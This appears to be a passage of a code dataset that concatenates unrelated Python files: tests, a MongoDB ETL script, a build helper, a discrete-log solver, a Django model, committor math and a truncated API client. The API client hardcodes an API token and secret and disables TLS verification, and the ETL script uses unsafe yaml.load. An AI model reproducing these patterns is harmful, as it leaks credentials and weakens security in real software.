testdata.WHITELIST_EXAMPLE_SINGLE_XML):\n whitelist = medmij.Whitelist(xml)\n self.assertTrue(isinstance(whitelist, medmij.Whitelist))\n\n def test_parse_invalid_xml(self) -> None:\n with self.assertRaises(lxml.etree.XMLSyntaxError):\n medmij.Whitelist(' None:\n for xml in (testdata.WHITELIST_XSD_FAIL1,\n testdata.WHITELIST_XSD_FAIL2):\n with self.assertRaises(lxml.etree.XMLSyntaxError):\n medmij.Whitelist(xml)\n\n def test_whitelist_contains(self) -> None:\n whitelist = medmij.Whitelist(testdata.WHITELIST_EXAMPLE_XML)\n self.assertIn(\"rcf-rso.nl\", whitelist)\n self.assertNotIn(\"rcf-rso.nl.\", whitelist)\n self.assertNotIn(\"RFC-RSO.NL\", whitelist)\n self.assertNotIn(None, whitelist)\n\n def test_whitelist_download(self) -> None:\n with patch('urllib.request.urlopen') as mock_urlopen:\n mock_urlopen.return_value = string_urlopen(\n testdata.WHITELIST_EXAMPLE_XML)\n whitelist = medmij.Whitelist.from_url(\"http://example.com/\")\n self.assertIsInstance(whitelist, medmij.Whitelist)\n","sub_path":"medmij/tests/test_whitelist.py","file_name":"test_whitelist.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409280158","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport pandas as pd\nimport numpy as np\nimport pymongo\nimport dns\nfrom bson.objectid import ObjectId\nimport datetime\nimport pprint\nimport re\nimport yaml\nfrom datetime import timezone, datetime, tzinfo, date,time, timedelta\nimport pdb\nimport logging\nimport time\n\nlogging.basicConfig(filename='drivers_metrics.log',level=logging.INFO)\n\n#root_dir = os.path.abspath(os.path.join(__file__, '../..'))\n\n\nMAX_DELTA = 1\nINTERNAL_TOOLS_COLLECTION = \"stats_internal_daily\"\nEXTERNAL_APPS_COLLECTION = 'stats_external_daily'\n\ndef internal_apps_regex():\n regex = re.compile(r\"(stitch\\||mongosqld|mongodrdl|MongoDB Automation Agent|MongoDB Atlas|MongoDB Compass|mongoimport|mongoexport|mongodump|mongorestore|mongomirror|MongoDB PIT|MongoDB CPS|MongoDB Backup|MongoDB Monitoring)\")\n return regex\n\n\ndef today_midnight():\n today = datetime.today()\n today_midnight = datetime(today.year, today.month, today.day,tzinfo=timezone.utc)\n return today_midnight\n\ndef get_date(date_string):\n date_from_string = datetime.strptime(date_string, '%Y%m%d')\n date_midnight = datetime(date_from_string.year,date_from_string.month,date_from_string.day, tzinfo=timezone.utc)\n return date_midnight\n\ndef end_date(days=0):\n return today_midnight() - timedelta(days)\n\ndef start_and_end_date(end_date_string=None,start_date_string=None):\n end_date = get_date(end_date_string)\n start_date = get_date(start_date_string)\n return (start_date,end_date)\n\ndef default_start_end_date(collection):\n pipeline = [\n {\n '$group': {\n '_id': None,\n 'max': {\n '$max': '$ts'\n }\n }\n }, {\n '$project': {\n 'max': 1,\n '_id': 0\n }\n }\n ]\n last_date = run_aggregation(collection,pipeline)[0]['max']\n last_date_midnight = datetime(last_date.year,last_date.month,last_date.day, tzinfo=timezone.utc)\n print('max found date midnight: %s' % last_date_midnight)\n start_date = last_date_midnight+timedelta(1)\n end_date = today_midnight()\n return (start_date,end_date)\n\ndef java_driver_names():\n return [\n 'mongo-java-driver',\n 'mongo-java-driver|mongo-java-driver-reactivestreams',\n 'mongo-java-driver|mongo-java-driver-rx',\n 'mongo-java-driver|mongo-scala-driver',\n 'mongo-java-driver|sync',\n 'mongo-java-driver|legacy',\n 'mongo-java-driver|async',\n 'mongo-java-driver|async|mongo-java-driver-reactivestreams',\n 'mongo-java-driver|async|mongo-scala-driver'\n ]\n\ndef other_drivers_names():\n return [\n 'mgo',\n 'mongo-csharp-driver',\n 'mongo-go-driver',\n 'mongo-ruby-driver',\n 'mongo-rust-driver-prototype',\n 'mongo-rust-driver',\n 'mongoc',\n 'mongoc / ext-mongodb:HHVM',\n 'mongoc / ext-mongodb:PHP',\n 'mongoc / mongocxx',\n 'mongoc / MongoSwift',\n 'MongoDB Perl Driver',\n 'MongoKitten',\n 'nodejs',\n 'nodejs-core',\n 'PyMongo',\n 'PyMongo|Motor',\n 'PyMongo|PyMODM',\n 'nodejs|Mongoose',\n 'mongo-java-driver|mongo-spark',\n 'mongo-java-driver|legacy|mongo-spark',\n 'mongo-java-driver|sync|mongo-kafka'\n ]\n\ndef driver_names():\n return java_driver_names() + other_drivers_names()\n\ndef driver_name_condition():\n return list(map(lambda x: {'entries.raw.driver.name': x}, driver_names()))\n\ndef pipeline_drivers(start_date,end_date):\n pipeline = [\n {\n '$match': {\n 'rt': {\n '$gte': start_date,\n '$lt': end_date\n }\n }\n }, {\n '$unwind': {\n 'path': '$entries',\n 'preserveNullAndEmptyArrays': False\n }\n }, {\n '$match': {\n '$or': driver_name_condition()\n }\n }, {\n '$project': {\n 'ts': '$rt',\n 'd': '$entries.raw.driver.name',\n 'dv': '$entries.raw.driver.version',\n 'ts': '$rt',\n 'gid': '$gid',\n 'os': '$entries.raw.os.name',\n 'osa': '$entries.raw.os.architecture',\n 'osv': '$entries.raw.os.version',\n 'a': '$entries.raw.application.name',\n 'p': '$entries.raw.platform',\n 'sv': '$mv',\n 'day': {'$dayOfMonth': '$rt'},\n 'month': {'$month': '$rt'},\n 'year': {'$year': '$rt'},\n }\n },{\n '$group': {\n '_id': {\n 'd': '$d',\n 'dv': '$dv',\n 'gid': '$gid',\n 'os': '$os',\n 'osa': '$osa',\n 'osv': '$osv',\n 'p': '$p',\n 'a': '$a',\n 'sv': '$sv',\n 'day': '$day',\n 'month': '$month',\n 'year': '$year'\n },\n 'ts': {\n '$last': '$ts'\n }\n }\n }, {\n '$project': {\n 'd': '$_id.d',\n 'dv': '$_id.dv',\n 'gid': '$_id.gid',\n 'os': '$_id.os',\n 'osa': '$_id.osa',\n 'osv': '$_id.osv',\n 'p': '$_id.p',\n 'a': '$_id.a',\n 'sv': '$_id.sv',\n 'day': '$_id.day',\n 'month': '$_id.month',\n 'year': '$_id.year',\n 'ts': 1,\n '_id': 0\n }\n }\n ]\n return pipeline\n\ndef pipeline_external_apps():\n pipeline = [\n {\n '$group': {\n '_id': {\n 'd': '$d',\n 'dv': '$dv',\n 'gid': '$gid',\n 'sv': '$sv',\n 'day': '$day',\n 'p': '$p',\n 'month': '$month',\n 'year': '$year',\n 'lver': '$lver',\n 'prov': '$prov',\n 'fr': '$fr',\n 'os': '$os',\n 'osa': '$osa',\n 'osv': '$osv'\n },\n 'ts': {\n '$max': '$ts'\n }\n }\n }, {\n '$project': {\n 'ts': 1,\n 'd': '$_id.d',\n 'dv': '$_id.dv',\n 'gid': '$_id.gid',\n 'sv': '$_id.sv',\n 'p': '$_id.p',\n 'day': '$_id.day',\n 'month': '$_id.month',\n 'year': '$_id.year',\n 'lver': '$_id.lver',\n 'fr': '$_id.fr',\n 'prov': '$_id.prov',\n 'os': '$_id.os',\n 'osa': '$_id.osa',\n 'osv': '$_id.osv',\n '_id': 0\n }\n }\n]\n return pipeline\n\ndef run_aggregation(collection,pipeline,maxMS=10000000,allowDisk=True):\n return list(collection.aggregate(pipeline,maxTimeMS = maxMS,allowDiskUse=allowDisk))\n\ndef language_version_and_framework(doc):\n language_version = None\n framework = None\n provider = None\n driver_name = doc['d']\n if 'p' in doc:\n try:\n platform_name = doc['p']\n if driver_name in ['PyMongo','PyMongo|Motor']:\n split_str = re.split(r'\\|',platform_name)\n language_version = re.sub(r'\\.(final|candidate)\\.\\d','',split_str[0]).replace(' ','') # TODO: PyPy and Python version?\n framework = (None if (len(split_str) == 1) else split_str[1].replace(' ','')) #TODO: tornado version?\n elif driver_name in ['nodejs','nodejs-core']:\n #'Node.js v8.11.3, LE, mongodb-core: 3.2.5'\n split_str = platform_name.replace('Node.js v','').split(',')\n language_version = split_str[0]\n elif driver_name == 'mongo-go-driver':\n #go1.10.8\n language_version = platform_name.replace('go','')\n elif driver_name in java_driver_names():\n if driver_name == 'mongo-java-driver|mongo-scala-driver':\n #'Java/Oracle Corporation/1.8.0_202-b08|Scala/2.12.6'\n #TODO: confirm if need versions for both java and scala\n split_str = platform_name.replace('|','/').split('/')\n language_version = { 'java': split_str[2], 'scala': split_str[4]}\n else:\n #Java/Oracle Corporation/1.8.0_181-b15\n language_version = platform_name.split('/')[2]\n provider = platform_name.split('/')[1]\n elif driver_name == 'mongo-ruby-driver':\n #'mongoid-6.3.0, 2.5.1, x86_64-linux-musl, x86_64-pc-linux-musl',\n # '2.4.6, x86_64-linux, x86_64-pc-linux-gnu'\n #TODO\n split_str = platform_name.split(',')\n if platform_name.find('mongoid') > -1:\n framework = split_str[0]\n language_version = split_str[1]\n else:\n language_version = split_str[0]\n elif driver_name == 'MongoDB Perl Driver':\n #Perl v5.18.2 x86_64-linux-gnu-thread-multi\n language_version = platform_name.split(' ')[1].replace('v','')\n elif driver_name == \"mongo-csharp-driver\":\n #Mono 5.14.0 (explicit/969357ac02b)\n #.NET Core 4.6.26926.01\n #NET Framework 4.6.1586.0\n pattern = r'.?([a-zA-Z]+ )+' # find 1 or more words that do not contain numbers\n framework = {\n 'fname': re.search(pattern,platform_name).group(0).rstrip(),\n 'fv': re.sub(pattern,'',platform_name).split(' ')[0]\n }\n else:\n pass\n if language_version is not None:\n doc['lver'] = language_version\n if framework is not None:\n doc['fr'] = framework\n if provider is not None:\n doc['prov'] = provider\n\n except Exception as e:\n logging.error(\"Exception %s for doc with platform string %s\",e,platform_name)\n print(\"error detected\")\n else:\n logging.info(\"Document with driver name %s did not have platform field\",driver_name)\n return doc\n\ndef process_all_docs(docs):\n for doc in docs:\n process_doc(doc)\n\ndef update_list_with_lang_ver_framework(docs):\n result = list(map(lambda x: language_version_and_framework(x), docs))\n return result\n\ndef prod_connection_string(username,password):\n return \"mongodb://{}:{}@datawarehouseprod-shard-00-00-coq6x.mongodb.net:27017,datawarehouseprod-shard-00-01-coq6x.mongodb.net:27017,datawarehouseprod-shard-00-02-coq6x.mongodb.net:27017/test?ssl=true&replicaSet=DataWarehouseProd-shard-0&authSource=admin\".format(username,password)\n\ndef postprocessing_connection_string(username,password):\n return \"mongodb+srv://{}:{}@cluster0-ee68b.mongodb.net/test\".format(username,password)\n\ndef function_with_time_elapsed(message):\n def decorator(function):\n def wrapper(*args,**kwargs):\n start_time = datetime.today()\n res = function(*args,**kwargs)\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"{}_{}\".format(message,time_elapsed))\n return res\n return wrapper\n return decorator\n\ndef group_external_apps(list):\n df = pd.DataFrame(list)\n if 'a' in df.columns:\n df = df.drop(columns=['a'])\n df = df.replace('', ' ', regex = True)\n df = df.replace(np.nan, '', regex = True)\n df = df.groupby(['d','p','month','day','year','sv','dv','os','osa','osv','gid'],as_index=False).max().drop_duplicates()\n df = df.replace({'': None})\n df = df.replace(' ', '')\n d_dict = df.to_dict('r')\n return d_dict\n\n\n\ndef etl(start_date,end_date):\n #pdb.set_trace()\n #extract\n client = mdb_client_dw_prod()\n raw_metadata = get_raw_client_metadata(client)\n print(pipeline_drivers(start_date,end_date))\n logging.info(pipeline_drivers(start_date,end_date))\n start_time = datetime.today()\n docs = run_aggregation(raw_metadata,pipeline_drivers(start_date,end_date))\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"aggregation took {}\".format(time_elapsed))\n print(\"start parsing:\")\n start_time = datetime.today()\n if len(docs) > 0:\n #transform\n internal_list = [doc for doc in docs if ('a' in doc.keys() and internal_apps_regex().search(doc['a']))]\n external_list = filter(lambda i: i not in internal_list, docs)\n external_list = group_external_apps(external_list)\n external_list = update_list_with_lang_ver_framework(external_list)\n #load\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"parsing took {}\".format(time_elapsed))\n print(\"inserting internal tools:\")\n if len(internal_list) > 0:\n internal_collection.insert_many(internal_list)\n print(\"inserting external apps:\")\n start_time = datetime.today()\n external_collection.insert_many(external_list)\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"insert took {}\".format(time_elapsed))\n #logging.info(\"inserted %s docs\",len(external_list))\n else:\n logging.info(\"no docs. Check original dataset\")\n client.close()\n print(\"Done.\")\n\ndef etl_external_drivers():\n pipeline = pipeline_external_apps()\n print(pipeline)\n start_time = datetime.today()\n docs = run_aggregation(staging_collection,pipeline)\n end_time = datetime.today()\n time_elapsed = end_time - start_time\n print(\"aggregation took {}\".format(time_elapsed))\n external_collection.insert_many(docs)\n\n\n#db.drivers_stats.dropIndex(\"app_name_text\"); db.drivers_stats.createIndex({a: \"text\", ts: 1},{name: \"app_ts_text_compound\"});\n\n\ndef query_delete_many(start_date,end_date,collection):\n query = {\n 'a': {\n '$not': internal_apps_regex()\n },\n 'ts': {\n '$gte': start_date,\n '$lt': end_date,\n }\n }\n result = collection.deleteMany(query)\n return result\n\ndef get_secrets():\n stream = open('secrets.yml', 'r')\n secrets = yaml.load(stream)\n username_dw_prod, pw_dw_prod, u_postprocessing, pw_postprocessing = (secrets['u_dw_prod'],secrets['pw_dw_prod'],secrets['u_postprocessing'],secrets['pw_postprocessing'])\n return (username_dw_prod, pw_dw_prod, u_postprocessing, pw_postprocessing)\n\ndef mdb_client_dw_prod():\n u_dw_prod, pw_dw_prod, u_dw_postproc, p_dw_postproc = get_secrets()\n prod = pymongo.MongoClient(prod_connection_string(u_dw_prod,pw_dw_prod),\n socketTimeoutMS = 3600000)\n return prod\n\ndef get_raw_client_metadata(client):\n dw_raw = client.dw_raw\n raw_metadata_collection = dw_raw['cloud__cloud_backend__rawclientmetadata']\n return raw_metadata_collection\n\ndef etl_for_range_of_dates(start_date,end_date):\n while (end_date - timedelta(MAX_DELTA)) > start_date:\n interim_start_date = end_date - timedelta(MAX_DELTA)\n print(\"running etl for start_date: %s, end_date: %s\" % (interim_start_date,end_date))\n etl(interim_start_date,end_date)\n end_date = interim_start_date\n if (end_date > start_date):\n print(\"running etl for start_date: %s, end_date: %s\" % (start_date,end_date))\n etl(start_date,end_date)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n u_dw_prod, pw_dw_prod, u_postprocessing, pw_postprocessing = get_secrets()\n parser.add_argument('-username_dw_prod', default = u_dw_prod)\n parser.add_argument('-pw_dw_prod',default = pw_dw_prod)\n parser.add_argument('-u_postprocessing', default= u_postprocessing)\n parser.add_argument('-pw_postprocessing', default = pw_postprocessing)\n parser.add_argument('-start_delta', default = 7, type=int)\n parser.add_argument('-end_date') # format '%Y%m%d'\n parser.add_argument('-start_date')\n parser.add_argument('--no-default_dates', dest='since_last', action='store_false')\n parser.set_defaults(since_last=True)\n options = parser.parse_args()\n #pdb.set_trace()\n print('connecting..')\n my_cluster = pymongo.MongoClient(postprocessing_connection_string(options.u_postprocessing,options.pw_postprocessing),retryWrites = True,socketTimeoutMS = 3600000)\n db = my_cluster.drivers\n internal_collection = db[INTERNAL_TOOLS_COLLECTION]\n external_collection = db[EXTERNAL_APPS_COLLECTION]\n print('deriving dates...')\n if (options.since_last is True):\n start_date,end_date = default_start_end_date(external_collection)\n else:\n start_date,end_date = start_and_end_date(options.end_date,options.start_date)\n print('start date %s , end date %s' % (start_date,end_date))\n print('starting ETL..')\n etl_for_range_of_dates(start_date,end_date)\n","sub_path":"scripts/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":17263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"196070466","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom waflib.Configure import conf\nfrom waflib import Options #, Utils\nimport os\n\ndef options(opt):\n pass\n\n# Check resulting filename for undefined symbols.\n# Environment: TARGET\n@conf\ndef undef_check(bld, filename):\n bld(\n source = bld.path.find_or_declare(filename),\n rule = '%s -u ${SRC[0].abspath()}' % bld.env['NM'],\n name = 'nm undef check ('+filename+')'\n )\n\n@conf\ndef setup_module_build(bld, name, prefix, sources):\n if prefix: prefix = prefix + '/'\n arch = Options.options.arch\n platform = Options.options.platform\n\n mod = bld.program(\n source = sources,\n target = name+'.comp',\n # debug depends on platform\n # runtime doesn't depend on anything\n use = 'component_support interfaces kernel cxx debug common platform runtime',\n env = bld.all_envs['KERNEL_ENV'].derive()\n )\n mod.gen_incpaths(prefix+'../')\n mod.includes.append('.')\n mod.includes.append(prefix)\n\n # -Wl,\n mod.env.append_unique('LINKFLAGS', ['-r']) #, '--error-unresolved-symbols']); # Components are relocatable\n if platform != 'hosted':\n mod.env.append_unique('LINKFLAGS', ['-Wl,-T,../modules/component.lds', '-Wl,-Map,'+name+'.map'])\n bld.undef_check(mod.target)\n node = bld.path.find_or_declare(mod.target)\n bld.all_comp_targets += [node.bldpath()]\n return mod\n","sub_path":"src/waftools/module_template.py","file_name":"module_template.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"648338263","text":"def InverseCalculator(g,p):\n return fastPower(g,p-2,p)\n\ndef fastPower(g,x,p):\n a = g\n b = 1\n while x>0:\n if x%2 == 1:\n b = (b*a)%p\n a = (a*a)%p\n x = x//2\n return b\n\ndef int2bin(integer):\n binString = ''\n while integer:\n if integer % 2 == 1:\n binString = '1' + binString\n else:\n binString = '0' + binString\n integer //= 2\n while len(binString)%8 != 0:\n binString = '0' + binString\n return binString\n\ndef bin2msg(binary):\n return ''.join(chr(int(binary[i*8:i*8+8],2)) for i in range(len(binary)//8))\n\ndef int2msg(integer):\n return bin2msg(int2bin(integer))\n#read information from input.txt\nread=[]\nf=open('input.txt')\nlines = f.readlines()\nfor line in lines:\n line=line.strip('\\n')\n read.append(line)\np,g,A,c1,c2=int(read[0]),int(read[1]),int(read[2]),int(read[3]),int(read[4])\n\nlist1=[]\nlist2=[]\ndict1={}\ndict2={}\n\nn=int(p**0.5)+1\ng_inverse=InverseCalculator(g,p)\nsignal=0\ni=0\n\nwhile signal!=1:\n list1.append(fastPower(g,i,p))\n list2.append(fastPower(g_inverse,i*n,p)*A%p)\n dict1[list1[i]]=i\n dict2[list2[i]]=i\n if list1[i] in list2:\n a=i+(dict2[list1[i]])*n\n signal=1\n if list2[i] in list1:\n a=dict1[list2[i]]+i*n\n signal=1\n i+=1\n\nnumber=(fastPower(InverseCalculator(c1,p),a,p)*c2)%p\nprint (int2msg(number))","sub_path":"BSGS/Shanks_algorithm.py","file_name":"Shanks_algorithm.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522817862","text":"from django.db import models\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n \nfrom django.db import models\n \n \nclass KeyWord(models.Model):\n keyword = models.CharField(\n 'Keywords', max_length=256, primary_key=True, help_text='User sent Keywords')\n content = models.TextField(\n 'Content', null=True, blank=True, help_text='User sent Content ')\n \n pub_date = models.DateTimeField('Published Date', auto_now_add=True)\n update_time = models.DateTimeField('Update Time', auto_now=True, null=True)\n published = models.BooleanField('Published Status', default=True)\n \n def __unicode__(self):\n return self.keyword\n \n class Meta:\n verbose_name='Keywords'\n verbose_name_plural=verbose_name\n","sub_path":"weichat/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537668099","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2014--, The Qiita Development Team.\n#\n# Distributed under the terms of the BSD 3-clause License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# -----------------------------------------------------------------------------\n\nfrom unittest import TestCase, main\nfrom tempfile import mkstemp\nfrom os import close, remove\nfrom os.path import exists, join, dirname, abspath\n\nfrom qiita_core.util import qiita_test_checker\nfrom qiita_ware.dispatchable import (\n create_sample_template, update_sample_template, delete_sample_template,\n update_prep_template, delete_artifact, copy_raw_data, create_raw_data)\nfrom qiita_db.study import Study\nfrom qiita_db.artifact import Artifact\nfrom qiita_db.exceptions import QiitaDBUnknownIDError\nfrom qiita_db.metadata_template.prep_template import PrepTemplate\n\n\n@qiita_test_checker()\nclass TestDispatchable(TestCase):\n def setUp(self):\n fd, self.fp = mkstemp(suffix=\".txt\")\n close(fd)\n with open(self.fp, 'w') as f:\n f.write(\"sample_name\\tnew_col\\n\"\n \"1.SKD6.640190\\tnew_vale\")\n\n self._clean_up_files = [self.fp]\n\n def tearDown(self):\n for fp in self._clean_up_files:\n if exists(fp):\n remove(fp)\n\n def test_create_raw_data(self):\n fps = {'raw_barcodes': 'uploaded_file.txt',\n 'raw_forward_seqs': 'update.txt'}\n obs = create_raw_data(\"FASTQ\", PrepTemplate(1), fps, name=\"New name\")\n exp = {'status': 'danger',\n 'message': \"Error creating artifact: Prep template 1 already \"\n \"has an artifact associated\"}\n self.assertEqual(obs, exp)\n\n def test_copy_raw_data(self):\n obs = copy_raw_data(PrepTemplate(1), 1)\n exp = {'status': 'danger',\n 'message': \"Error creating artifact: Prep template 1 already \"\n \"has an artifact associated\"}\n self.assertEqual(obs, exp)\n\n def test_delete_artifact(self):\n obs = delete_artifact(1)\n exp = {'status': 'danger',\n 'message': 'Cannot delete artifact 1: it has children: 2, 3'}\n self.assertEqual(obs, exp)\n\n obs = delete_artifact(3)\n exp = {'status': 'success',\n 'message': ''}\n self.assertEqual(obs, exp)\n\n with self.assertRaises(QiitaDBUnknownIDError):\n Artifact(3)\n\n def test_create_sample_template(self):\n obs = create_sample_template(self.fp, Study(1), False)\n exp = {'status': 'danger',\n 'message': \"The 'SampleTemplate' object with attributes \"\n \"(id: 1) already exists.\"}\n self.assertEqual(obs, exp)\n\n def test_create_sample_template_nonutf8(self):\n fp = join(dirname(abspath(__file__)), 'test_data',\n 'sample_info_utf8_error.txt')\n obs = create_sample_template(fp, Study(1), False)\n exp = {'status': 'danger',\n 'message': u\"Non UTF-8 characters found in columns:\"\n u\"\\n\\ufffdcollection_timestamp: row(s) 1\"}\n self.assertEqual(obs, exp)\n\n def test_update_sample_template(self):\n obs = update_sample_template(1, self.fp)\n exp = {'status': 'warning',\n 'message': (\"Sample names were already prefixed with the study \"\n \"id.\\nThe following columns have been added to the \"\n \"existing template: new_col\\nThere are no \"\n \"differences between the data stored in the DB and \"\n \"the new data provided\")}\n self.assertEqual(obs['status'], exp['status'])\n self.assertItemsEqual(obs['message'].split('\\n'),\n exp['message'].split('\\n'))\n\n def test_delete_sample_template(self):\n obs = delete_sample_template(1)\n exp = {'status': 'danger',\n 'message': 'Sample template cannot be erased because there '\n 'are prep templates associated.'}\n self.assertEqual(obs, exp)\n\n def test_update_prep_template(self):\n obs = update_prep_template(1, self.fp)\n exp = {'status': 'warning',\n 'message': 'Sample names were already prefixed with the study '\n 'id.\\nThe following columns have been added to the '\n 'existing template: new_col\\nThere are no '\n 'differences between the data stored in the DB and '\n 'the new data provided'}\n self.assertEqual(obs['status'], exp['status'])\n self.assertItemsEqual(obs['message'].split('\\n'),\n exp['message'].split('\\n'))\n\nif __name__ == '__main__':\n main()\n","sub_path":"qiita_ware/test/test_dispatchable.py","file_name":"test_dispatchable.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"123472485","text":"\n# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Free University\n# Berlin, 14195 Berlin, Germany.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nr\"\"\"This module provides functions for the computation of forward and\nbackward comittors using dense linear algebra.\n\n.. moduleauthor:: B.Trendelkamp-Schroer \n\n\"\"\"\nfrom __future__ import absolute_import, division\nfrom six.moves import range\n\nimport numpy as np\nfrom scipy.linalg import solve\n\nfrom .stationary_vector import stationary_distribution_from_backward_iteration as statdist\n\n\ndef forward_committor(T, A, B):\n r\"\"\"Forward committor between given sets.\n\n The forward committor u(x) between sets A and B is the probability\n for the chain starting in x to reach B before reaching A.\n\n Parameters\n ----------\n T : (M, M) ndarray\n Transition matrix\n A : array_like\n List of integer state labels for set A\n B : array_like\n List of integer state labels for set B\n\n Returns\n -------\n u : (M, ) ndarray\n Vector of forward committor probabilities\n\n Notes\n -----\n The forward committor is a solution to the following\n boundary-value problem\n\n .. math::\n\n \\sum_j L_{ij} u_{j}=0 for i in X\\(A u B) (I)\n u_{i}=0 for i \\in A (II)\n u_{i}=1 for i \\in B (III)\n\n with generator matrix L=(P-I).\n\n \"\"\"\n X = set(range(T.shape[0]))\n A = set(A)\n B = set(B)\n AB = A.intersection(B)\n notAB = X.difference(A).difference(B)\n if len(AB) > 0:\n raise ValueError(\"Sets A and B have to be disjoint\")\n L = T - np.eye(T.shape[0]) # Generator matrix\n\n \"\"\"Assemble left hand-side W for linear system\"\"\"\n \"\"\"Equation (I)\"\"\"\n W = 1.0 * L\n \"\"\"Equation (II)\"\"\"\n W[list(A), :] = 0.0\n W[list(A), list(A)] = 1.0\n \"\"\"Equation (III)\"\"\"\n W[list(B), :] = 0.0\n W[list(B), list(B)] = 1.0\n\n \"\"\"Assemble right hand side r for linear system\"\"\"\n \"\"\"Equation (I+II)\"\"\"\n r = np.zeros(T.shape[0])\n \"\"\"Equation (III)\"\"\"\n r[list(B)] = 1.0\n\n u = solve(W, r)\n return u\n\n\ndef backward_committor(T, A, B, mu=None):\n r\"\"\"Backward committor between given sets.\n\n The backward committor u(x) between sets A and B is the\n probability for the chain starting in x to have come from A last\n rather than from B.\n\n Parameters\n ----------\n T : (M, M) ndarray\n Transition matrix\n A : array_like\n List of integer state labels for set A\n B : array_like\n List of integer state labels for set B\n mu : (M, ) ndarray (optional)\n Stationary vector\n\n Returns\n -------\n u : (M, ) ndarray\n Vector of forward committor probabilities\n\n Notes\n -----\n The forward committor is a solution to the following\n boundary-value problem\n\n .. math::\n\n \\sum_j K_{ij} \\pi_{j} u_{j}=0 for i in X\\(A u B) (I)\n u_{i}=1 for i \\in A (II)\n u_{i}=0 for i \\in B (III)\n\n with adjoint of the generator matrix K=(D_pi(P-I))'.\n\n \"\"\"\n X = set(range(T.shape[0]))\n A = set(A)\n B = set(B)\n AB = A.intersection(B)\n notAB = X.difference(A).difference(B)\n if len(AB) > 0:\n raise ValueError(\"Sets A and B have to be disjoint\")\n if mu is None:\n mu = statdist(T)\n K = np.transpose(mu[:, np.newaxis] * (T - np.eye(T.shape[0])))\n\n \"\"\"Assemble left-hand side W for linear system\"\"\"\n \"\"\"Equation (I)\"\"\"\n W = 1.0 * K\n \"\"\"Equation (II)\"\"\"\n W[list(A), :] = 0.0\n W[list(A), list(A)] = 1.0\n \"\"\"Equation (III)\"\"\"\n W[list(B), :] = 0.0\n W[list(B), list(B)] = 1.0\n\n \"\"\"Assemble right-hand side r for linear system\"\"\"\n \"\"\"Equation (I)+(III)\"\"\"\n r = np.zeros(T.shape[0])\n \"\"\"Equation (II)\"\"\"\n r[list(A)] = 1.0\n\n u = solve(W, r)\n\n return u\n","sub_path":"msmtools/analysis/dense/committor.py","file_name":"committor.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"227182497","text":"import sys, json, requests, time, uuid, hmac, hashlib, base64\nBASE_URL = 'https://localhost:9700'\nAPI_TOKEN = 'LIKUuWpU4BBU3ax52CxXB9iwezRcLG1m'\nAPI_SECRET = 'AtzpTcEeFdVqRRDiMIrqrsinFv20NrWu'\n\ndef auth_request(method, path, headers=None, data=None):\n auth_timestamp = str(int(time.time()))\n auth_nonce = uuid.uuid4().hex\n auth_string = '&'.join([API_TOKEN, auth_timestamp, auth_nonce,\n method.upper(), path] + ([data] if data else []))\n auth_signature = base64.b64encode(hmac.new(\n API_SECRET, auth_string, hashlib.sha256).digest())\n auth_headers = {\n 'Auth-Token': API_TOKEN,\n 'Auth-Timestamp': auth_timestamp,\n 'Auth-Nonce': auth_nonce,\n 'Auth-Signature': auth_signature,\n }\n if headers:\n auth_headers.update(headers)\n return getattr(requests, method.lower())(\n BASE_URL + path,\n verify=False,\n headers=auth_headers,\n data=data,\n)\n\nresponse = auth_request('GET','/user/54c079837fa0572d1ed6946d',)\nemail=sys.argv[1]\nassert(response.status_code == 200)\ntype = 'client'\ndata = response.json()\n\nfor value in data:\n\tif value['type'] == type and value['email'] == email:\n\t\tresponse = 